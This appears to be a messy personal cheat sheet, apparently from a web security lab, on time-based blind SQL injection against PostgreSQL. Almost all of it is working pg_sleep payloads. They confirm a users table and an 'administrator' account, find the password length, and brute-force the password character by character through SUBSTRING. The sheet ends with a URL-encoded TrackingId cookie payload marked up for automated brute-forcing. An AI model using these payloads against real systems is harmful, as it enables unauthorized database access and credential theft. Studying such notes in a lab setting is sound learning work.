discovering time-based blind SQLi

>>>           '

sql cheat sheet:

                 '||pg_sleep(10)--



true means delay / false means fast load path


'||(SELECT CASE WHEN (2=2) THEN pg_sleep(10) ELSE pg_sleep(0)END--                  false



'||(SELECT CASE WHEN (2=2) THEN pg_sleep(10) ELSE pg_sleep(0)END FROM users)--      true




'||(SELECT CASE WHEN (2=2) THEN pg_sleep(10) ELSE pg_sleep(0)END FROM userslalalalala)--



WAITING IS TRUE  BUG //////       NOT WAIT FALSE  


1  '||(SELECT CASE WHEN (username='administrator') THEN pg_sleep(10) ELSE pg_sleep(0)END FROM users)--                   find admin






                                      find user form          findout only administrator  ???
                                    ___________________________________________________________

            
1,  '||(SELECT CASE WHEN (username='administrator') THEN pg_sleep(10) ELSE pg_sleep(0)END FROM userslalalalala)--  
                                      find admin form lalalalala

1,, '||(SELECT CASE WHEN (username='administratorlalalalala') THEN pg_sleep(10) ELSE pg_sleep(0)END FROM users)--    


1,,, '||(SELECT CASE WHEN (username='administrator'AND LENGTH(password)>1) THEN pg_sleep(10) ELSE pg_sleep(0)END FROM users)--         



1,,,, '||(SELECT CASE WHEN (username='administrator'AND LENGTH(password)=20) THEN pg_sleep(10) ELSE pg_sleep(0)END FROM users)--   





                                find user form          findout only passwd  ???
                               ___________________________________________________________


first letter a or b or c    >> bruteforce  attack..



2, '||(SELECT CASE WHEN (username='administrator'AND SUBSTRING(password,1,1)='a') THEN pg_sleep(10) ELSE pg_sleep(0)END FROM users)--

2,, 

                                                                                                              1@ !        2@ !  

TrackingId=fHmxzru3f1GZ8LPB'%7c%7c(SELECT%20CASE%20WHEN%20(username%3d'administrator'AND%20SUBSTRING(password%2c§1§%2c1)%3d'§a§')%20THEN%20pg_sleep(10)%20ELSE%20pg_sleep(0)END%20FROM%20users)--; session=dVSvZDPFSwCH76EjRkQ6ZUkuuAOo6hdZ





























